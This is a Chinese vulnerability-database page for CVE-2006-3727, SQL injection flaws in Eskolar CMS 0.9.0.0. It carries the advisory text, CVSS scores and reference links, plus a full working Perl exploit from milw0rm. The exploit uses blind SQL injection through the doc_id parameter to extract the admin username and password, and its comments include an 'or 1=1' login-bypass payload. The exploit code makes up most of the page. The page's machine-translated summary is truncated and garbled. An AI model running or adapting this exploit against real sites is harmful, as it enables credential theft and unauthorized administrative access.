CVE-2006-3727
CVSS7.5
发布时间 :2006-07-21 10:03:00
修订时间 :2011-03-07 21:39:21
NMOE    

[原文]Multiple SQL injection vulnerabilities in Eskolar CMS 0.9.0.0 allow remote attackers to execute arbitrary SQL commands via the (1) gr_1_id, (2) gr_2_id, (3) gr_3_id, and (4) doc_id parameters in (a) index.php; the (5) uid and (6) pwd parameters in (b) php/esa.php; and possibly other vectors related to files in php/lib/ including (c) del.php, (d) download_backup.php, (e) navig.php, (f) restore.php, (g) set_12.php, (h) set_14.php, and (i) upd_doc.php.


[CNNVD]CNNVD数据暂缺。


[机译]在Eskolar CMS 0.9.0.0多个SQL注入漏洞,允许远程攻击者执行任意SQL命令,通过(1)gr_1_id,(2),(3)gr_2_id gr_3_id,并(4)DOC_ID的参数(a)中的index.php;

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3727
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3727
(官方数据源) NVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/27809
(UNKNOWN)  XF  eskolar-phpesa-sql-injection(27809)
http://xforce.iss.net/xforce/xfdb/27808
(UNKNOWN)  XF  eskolar-index-sql-injection(27808)
http://www.vupen.com/english/advisories/2006/2869
(UNKNOWN)  VUPEN  ADV-2006-2869
http://www.securityfocus.com/bid/19045
(UNKNOWN)  BID  19045
http://www.osvdb.org/27399
(UNKNOWN)  OSVDB  27399
http://www.osvdb.org/27398
(UNKNOWN)  OSVDB  27398
http://www.osvdb.org/27397
(UNKNOWN)  OSVDB  27397
http://www.osvdb.org/27396
(UNKNOWN)  OSVDB  27396
http://www.osvdb.org/27395
(UNKNOWN)  OSVDB  27395
http://www.osvdb.org/27394
(UNKNOWN)  OSVDB  27394
http://www.osvdb.org/27393
(UNKNOWN)  OSVDB  27393
http://www.osvdb.org/27392
(UNKNOWN)  OSVDB  27392
http://www.osvdb.org/27391
(UNKNOWN)  OSVDB  27391
http://secunia.com/advisories/21101
(VENDOR_ADVISORY)  SECUNIA  21101
http://milw0rm.com/exploits/2032
(UNKNOWN)  MILW0RM  2032

- 漏洞信息 (2032)

Eskolar CMS 0.9.0.0 Remote Blind SQL Injection Exploit (EDBID:2032)
php webapps
2006-07-18 Verified
0 Jacek Wlodarczyk
N/A [点击下载]
#==================================================================================================
#!/usr/bin/perl
use IO::Socket;
#==================================================================================================

#==============================================================================#

#        Jacek Wlodarczyk (j4ck) - jacekwlo[at]gmail[dot]com                 #

#==============================================================================#

#==================================================================================================
#Title:       Eskolar CMS 0.9.0.0 Blind SQL Injection Exploit and bypass admin logon vulnerability
#Application: Eskolar CMS
#Version:     0.9.0.0
#Url:         http://sourceforge.net/projects/eskolar/
#==================================================================================================

#==================================================================================================
#Affected software description:

#Not properly sanitized input can be used to inject crafted SQL queries and cause
#the database server to generate an invalid SQL query. We can use Blind SQL Injection attack
#to determine username and password for CMS and also classical SQL Injection
#to bypass admin logon. Password for CMS is storing in database as clear text!
#There is using addslashes() function to filtration GET variables, but we can prepare
#SQL query without slashes in Blind attack. There is not addslashes() function to filtration
#variables using to log in, so we can use classical SQL Injection to log in as admin.

#Vulnerable files: index.php, php/lib/del.php, php/lib/download_backup.php, php/lib/navig.php,
#php/lib/restore.php, php/lib/set_12.php, php/lib/set_14.php, php/lib/upd_doc.php

#==================================================================================================

#==================================================================================================
#Sample vulnerable code: (Blind attack) (index.php - lines 161-172)

#if (isset ($_GET['gr_1_id'])) {
#	$gr_1_id = (get_magic_quotes_gpc()) ? $_GET['gr_1_id'] : addslashes($_GET['gr_1_id']);
#}
#if (isset ($_GET['gr_2_id'])) {
#	$gr_2_id = (get_magic_quotes_gpc()) ? $_GET['gr_2_id'] : addslashes($_GET['gr_2_id']);
#}
#if (isset ($_GET['gr_3_id'])) {
#	$gr_3_id = (get_magic_quotes_gpc()) ? $_GET['gr_3_id'] : addslashes($_GET['gr_3_id']);
#}
#if (isset ($_GET['doc_id'])) {
#	$doc_id = (get_magic_quotes_gpc()) ? $_GET['doc_id'] : addslashes($_GET['doc_id']);
#}

#...

#index.php - line 202
#$q = "SELECT * FROM ".$prefix."_admin_group_3 WHERE id = ".$gr_3_id." ORDER BY 'sorted' ASC";
#etc.

#...
#==================================================================================================

#==================================================================================================
#Bypass admin logon:

#Vulnerable code: (php/esa.php - lines 27-35)

#$uid = isset ($_POST['uid']) ? $_POST['uid'] : $_SESSION['uid'];
#$pwd = isset ($_POST['pwd']) ? $_POST['pwd'] : $_SESSION['pwd'];
#//$prefix="esa";
#$enter = 0;
#$_SESSION['uid'] = $uid;
#$_SESSION['pwd'] = $pwd;

#mysql_select_db($database_bkb, $bkb);
#$q_a = "SELECT * FROM ".$prefix."_admin_user WHERE `user` = '".$uid."' AND `password` = '".$pwd."'";

## If magic_quotes_gpc = Off attacker can log in as admin using classical SQL Injection attack.
## Eg: USER: j4ck' or 1=1/*
##     PSW:  *blank*

#===================================================================================================


#PoC Exploit:


if ((@ARGV lt 2) or (@ARGV gt 3))
  {
    &usage;
  }


sub usage()
{
  print "\r\n (c) Jacek Wlodarczyk (j4ck)\r\n\r\n";
  print "- Exploit for Eskolar CMS 0.9.0.0\r\n\r\n";
  print "- Usage: $0 <target> <target directory>\r\n";
  print "- <target>              -> Victim's target eg: http://www.victim.com\r\n";
  print "- <target directory>    -> Path to index.php  eg: /eskolar/\r\n";
  print "- Eg: http://127.0.0.1 /esa/\r\n\r\n";
  exit();
}


$HOST        = $ARGV[0];
$DIR         = $ARGV[1];
$prefixDB    = $ARGV[2];


if (@ARGV eq 2)
  {
    $prefixDB    = "esa";
  }



print "\r\nATTACKING : ".$HOST.$DIR."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;


#$positive = "?doc_id=999%20or%201=1--";
#$negative = "?doc_id=999%20or%201=0--";


       @ARR = ("user","password");


print "Connecting ...\r\n";
sleep(1);

TOP:
for ($k=0;$k<=$#ARR;$k++)

  {

    $j=1;
    $i = 32;
    $string='';
    $res='';


    while()
      {
        $l=0;
        for ($i=32;$i<=127;$i++)
          {


            $val  = "?doc_id=99999";
            $val .= "/**/or/**/1=1";
            $val .= "/**/and/**/ascii(substring(";
            $val .= "(select/**/$ARR[$k]/**/from/**/".$prefixDB."_admin_user/**/limit/**/1)";
            $val .= ",$j,1))/**/=/**/$i";


            $data="$DIR$val";

            $req = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error - connection failed!\r\n\r\n";

            print $req "GET $data HTTP/1.1\r\n";
            print $req "Host: $HOST\r\n";
            print $req "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\r\n";
            print $req "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
            print $req "Accept-Language: en-us;q=0.7,en;q=0.3\r\n";
            print $req "Accept-Encoding: gzip,deflate\r\n";
            print $req "Keep-Alive: 300\r\n";
            print $req "Connection: Keep-Alive\r\n";
            print $req "Cache-Control: no-cache\r\n";
            print $req "Connection: close\r\n\r\n";


            while ($ans = <$req>)
              {
                if ($ans =~ /404/ )
                  {
                    printf "\n\nFile not found.\r\n\r\n";
                    exit;
                  }


                if ($ans =~ /400/ )
                  {
                    printf "\n\nBad request.\r\n\r\n";
                    exit;
                  }


                if ($ans =~ /ORDER BY sorted ASC/)
                  {

                    $string .= chr($i);

                    if (((ord(substr($string,length($string)-1,length($string)-1))-ord(substr($string,length($string)-2,length($string)-2))) %2 eq 0) and (length($string) ge 2))
                      {
                        $res .= chr($i-1);
                        $l=1;
                      }
                    last;
                  }
              }

            if ($l eq 1)
              {
                print "Found: ".chr($i-1)."\r\n";
                sleep(1);
                last;
              }

            if ($i eq 127)
              {

                print "$ARR[$k] found: $res\r\n";
                $ARR[$k] = $res;

                if (($k eq 1) and (($ARR[0] ne '') or ($ARR[1] ne '')))
                  {
                    print "\r\n\r\n\r\n--------------------  Username => $ARR[0]";
                    print  " Password => $ARR[1]  -----------------------\r\n";
                  }

                elsif (($ARR[0] eq '') and ($ARR[1] eq ''))
                {
                  print "Nothing found ...";
                }


                if ($k eq 0)
                  {
                    sleep(1);
                    print "\nTrying Password\r\n";
                    sleep(1);
                  }

                sleep(1);

                next TOP;

              }

            print "\t\t\t\tTrying: ".chr($i)."\r\n";

          }

        $string = '';

        $j++;
      }

  }

#========================================================================================================

# milw0rm.com [2006-07-18]
		

- 漏洞信息

27391
Eskolar CMS index.php Multiple Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Eskolar CMS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'gr_1_id', 'gr_2_id', 'gr_3_id, and 'doc_id' variables. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2006-07-18 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站